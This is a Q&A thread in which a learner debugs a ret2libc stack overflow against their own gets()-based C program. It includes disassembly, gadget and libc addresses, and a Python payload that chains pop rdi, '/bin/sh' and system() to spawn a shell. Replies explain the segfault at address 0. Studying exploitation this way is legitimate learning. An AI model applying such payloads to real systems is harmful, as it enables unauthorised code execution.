# ret2libc segfault at address 0x0000000000000000

Tags: c, error-handling, segmentation-fault, gdb, buffer-overflow

I performed ret2libc but ended in segfault in `0x0000000000000000`. The vulnerable proagram is

```
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
void get()
{
  char buf[10];
  gets(buf);
  printf("%s\n",buf);
}
int main()
{
  get();
  printf("Done\n");
  return 1;
}
```

The disassembly from gdb is

```
(gdb) disass main
Dump of assembler code for function main:
   0x000055555555516d <+0>:     push   rbp
   0x000055555555516e <+1>:     mov    rbp,rsp
   0x0000555555555171 <+4>:     mov    eax,0x0
   0x0000555555555176 <+9>:     call   0x555555555145 <get>
   0x000055555555517b <+14>:    lea    rdi,[rip+0xe82]        # 0x555555556004
   0x0000555555555182 <+21>:    call   0x555555555030 <puts@plt>
   0x0000555555555187 <+26>:    mov    eax,0x1
   0x000055555555518c <+31>:    pop    rbp
   0x000055555555518d <+32>:    ret    
End of assembler dump.
(gdb) disass get
Dump of assembler code for function get:
   0x0000555555555145 <+0>:     push   rbp
   0x0000555555555146 <+1>:     mov    rbp,rsp
   0x0000555555555149 <+4>:     sub    rsp,0x10
   0x000055555555514d <+8>:     lea    rax,[rbp-0xa]
   0x0000555555555151 <+12>:    mov    rdi,rax
   0x0000555555555154 <+15>:    mov    eax,0x0
   0x0000555555555159 <+20>:    call   0x555555555040 <gets@plt>
   0x000055555555515e <+25>:    lea    rax,[rbp-0xa]
   0x0000555555555162 <+29>:    mov    rdi,rax
   0x0000555555555165 <+32>:    call   0x555555555030 <puts@plt>
   0x000055555555516a <+37>:    nop
   0x000055555555516b <+38>:    leave  
   0x000055555555516c <+39>:    ret    
End of assembler dump.
```

I used radare2 to find the gadget `pop rdi;ret` which is located at `0x7ffff7e1d7de`. `/bin/sh` is located at `0x7ffff7f7f1ac` and `system()` is located at `0x7ffff7e3f8a0`

```
(gdb) r < <(python -c 'print("\x41"*10 + "\x42"*8 + "\xde\xd7\xe1\xf7\xff\x7f\x00\x00" + "\xac\xf1\xf7\xf7\xff\x7f\x00\x00" + "\xa0\xf8\xe3\xf7\xff\x7f\x00\x00")')
Starting program: /home/kali/Desktop/c_system/a < <(python -c 'print("\x41"*10 + "\x42"*8 + "\xde\xd7\xe1\xf7\xff\x7f\x00\x00" + "\xac\xf1\xf7\xf7\xff\x7f\x00\x00" + "\xa0\xf8\xe3\xf7\xff\x7f\x00\x00")')

Breakpoint 1, main () at exploit.c:12
12        get();
(gdb) c
Continuing.
AAAAAAAAAABBBBBBBB�����
[Detaching after vfork from child process 2964]

Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()
```

The registers are

```
(gdb) i r
rax            0x0                 0
rbx            0x0                 0
rcx            0x0                 0
rdx            0x0                 0
rsi            0x7fffffffde88      140737488346760
rdi            0x2                 2
rbp            0x4242424242424242  0x4242424242424242
rsp            0x7fffffffe1b8      0x7fffffffe1b8
r8             0x0                 0
r9             0x0                 0
r10            0x8                 8
r11            0x246               582
r12            0x555555555060      93824992235616
r13            0x7fffffffe280      140737488347776
r14            0x0                 0
r15            0x0                 0
rip            0x0                 0x0
eflags         0x10216             [ PF AF IF RF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
```

I use a 64-bit machine.The program was compiled using `gcc -ggdb -Wall -fno-stack-protector -o a exploit.c`. Also I disabled aslr manually.
Why did it end in segfault?

Comment: Because buf can’t hold your string. And gets is not part of C anymore.

Comment: What do you mean by "gets is not part of c anymore"? The momory is overwritten as per the input order

Comment: it has been removed from the standard library because it’s dangerous.

Comment: But the memory is overwritten as intended

Comment: After it is overwritten it should spawn a shell instead it end in segfault

Comment: try compiling with -std=c18 to use the latest standard. Now you are compiling with decades old standard.

Comment: No luck with - std=c18. Same issue persists

Comment: no with -std=c18 your code should not compile at all and you will have to fix your error.

Comment: It actually compiled the same way as when not compiled with - std=c18. Both times warning was given

Comment: @Fredrik I used scanf() instead of gets and still the same error occurs and why the segfault occurs at `0x0000000000000000`? This address has nothing to do with the program

Comment: @Kingslaer your array buf does not have enough space for your string. That is the problem.

Comment: But I use only 10 bytes of the memory. How can it not have enough space? I have only some basic understanding of how memory works. Can you please explain why it does not have enough space?

Comment: 10 bytes including the null terminator?

Comment: Yeah it includes null terminator

Comment: @Fredrik I set breakpoints in system.c and examined the system() function. When it reached the __posix_spawn() function a shell is supposed to be spawned but it was not spawned and also the program exits normally without any segfault. After it exits the segfault occurs. It is so confusing why it behaves like this.

Answer (score 1, accepted):

The message

```
Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()
```

means that your program has jumped to address 0 (that is, the `%pc` is 0), which is an invalid address.  This is probably due to executing a `ret` instruction when the value on the top of the stack is 0.

You also see the message

```
[Detaching after vfork from child process 2964]
```

which likely means the `system` function is being called, but for whatever reason is not doing what you expect it to do.

To debug this sort of thing, you need to carefully step through the code one instruction at a time using `si` commmand (and occasional `ni` to skip over calls)

Comment: thank you for answering. I fixed the segfault issue. Also i debugged the code as per your instructions and found that `if(TEMP_FAILURE_RETRY(__waitpid(pid, &status, 0))!=pid)` in system.c file could be causing the issue. Also this condition does not fail. I'm stuck at correcting this. Can you help?

Comment: I tried `ls` command instead of `/bin/sh` and it worked fine as expected. Why does `/bin/sh` fail to execute a shell?